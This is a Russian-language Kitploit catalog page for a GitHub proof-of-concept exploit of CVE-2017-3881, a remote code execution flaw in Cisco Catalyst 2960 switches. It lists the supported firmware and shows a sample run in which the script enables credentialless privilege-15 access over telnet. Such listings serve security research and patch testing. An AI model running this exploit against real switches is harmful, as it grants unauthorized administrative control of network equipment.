Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-3881 — кредит artkond | Kitploit
Инструменты/GitHubGitHub/1337g/cve-2017-3881
Безопасность встроенных системФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на Проникновение
GitHub1337g/cve-2017-3881

CVE-2017-3881

кредит artkond

Репозиторий
22118 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2017-3881 Удаленное выполнение кода в Cisco IOS

Этот репозиторий содержит код Proof-Of-Concept для эксплуатации уязвимости удаленного выполнения кода, раскрытой Cisco Systems 17 марта 2017 года - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

Описание

Статья с описанием эксплуатации доступна здесь - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

Код эксплойта RCE доступен для коммутатора Cisco Catalyst 2960. Данный эксплойт зависит от прошивки. Поддерживаются две версии прошивки:

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

Код для отказа в обслуживании (Denial of service) доступен в виде модуля metasploit на Ruby. Он должен работать для большинства коммутаторов, упомянутых в бюллетене Cisco (требуется подтверждение).

Пример использования

$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

Автор

Artem Kondratenko https://twitter.com/artkond

Скачать инструмент